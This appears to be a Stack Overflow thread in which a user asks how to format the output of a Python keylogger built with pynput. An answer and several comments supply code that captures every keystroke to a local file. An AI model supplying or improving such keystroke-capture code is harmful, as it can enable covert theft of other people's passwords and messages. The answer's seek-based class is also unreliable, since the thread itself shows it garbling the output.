# How do I remove quotations from a variable and merge multiple into one line?

Tags: python

```
from pynput.keyboard import Key, Listener
import logging
import getpass
import os

logging.basicConfig(filename=("keylogger.txt"), level=logging.DEBUG, format="%(message)s")  
 
def on_press(key):
    logging.info(str(key))
 
with Listener(on_press=on_press) as listener :
    listener.join()
```

In the keylogger previously mentioned, I want the result to look something like this if I type "Hello":
`Hello`
But instead it comes out as:

```
'H'
'e'
'l'
'l'
'o'
```

I know i can use strings or libraries or whatever they are called, but i haven't coded using python in a year and have forgotten how.

Answer (score 1):

For a logging solution to file that works how you want it to, you can use `stream` instead of `filename`.

Then you can rewind current position in file so that you backtrack from the `\n` that the `logging` module (ostensibly) adds.

For example:

```py
import logging

stream = open('keylogger.txt', 'w')

logging.basicConfig(stream=stream, level=logging.DEBUG, format="%(message)s",)

logging.info('A')
stream.seek(stream.tell() - 1)

logging.info('B')
stream.seek(stream.tell() - 1)

logging.info('C')
stream.seek(stream.tell() - 1)
```

Contents of `keylogger.txt`:

```
ABC
```

#### Abstraction

To simplify the logic above, you could encapsulate file logging into a custom class, such as `KeyLogger` below:

```py
import logging


class KeyLogger:

    def __init__(self, fname: str = 'keylogger.txt'):
        self.stream = open(fname, 'w')
        self.count = 0
        logging.basicConfig(stream=self.stream, level=logging.DEBUG, format="%(message)s",)

    def _log(self, level, msg, *args, **kwargs):
        logging.log(level, msg, *args, **kwargs)
        count = self.count = self.count + 1
        self.stream.seek(count)

    def info(self, msg, *args, **kwargs):
        self._log(logging.INFO, msg, *args, **kwargs)
```

Usage:

```py
log = KeyLogger()

log.info('H')
log.info('e')
log.info('l')
log.info('l')
log.info('o')
```

Contents of `keylogger.txt`:

```
Hello
```

#### Adapted to This Use Case

```py
from pynput.keyboard import Key, Listener


## `KeyLogger` defined above
log = KeyLogger()


def on_press(key):
    log.info(str(key))


with Listener(on_press=on_press) as listener:
    listener.join()
```

Comment: In your comment, you have set the values for what is to be inputted into the text document, how would I change that to listen out for a key being pressed?

Comment: I am not sure I understand - do you mean to record actual key presses into the log file, instead of a sample key press sequence like `'Hello'`?

Comment: Yes, instead of having set values as: 'H','e','l','l','o', I would like it have the value from the keyboard library, so when I type something outside of the code, it registers into the text file as i generally wouldn't just be typing "Hello" and moreso whole paragraphs and such

Comment: @w1ndnd You already have that part. The only difference is how to initialize your logger.

Comment: @w1ndnd agreed, I think you got this - and just in case, I've added a "Adapted to This Use Case" section above.

Comment: @rv.kvetch I have used the code that you have given me, but if I type "Hello", it comes up with `'''''o'`. It only records the first character of `'H'` and so forth, which is the `'`. This is defined in `count = self.count = self.count + 1`. How could I change it so that it only records the second character, I have tried `+ 2` instead of `+ 1`?

Comment: Hmm - that is a bit strange. I'm not sure why it's wrapping things with quotes, but maybe you can try `log.info(str(key)[1:-1])` instead, to remove the single quotes? or even `log.info(str(key).strip("'"))`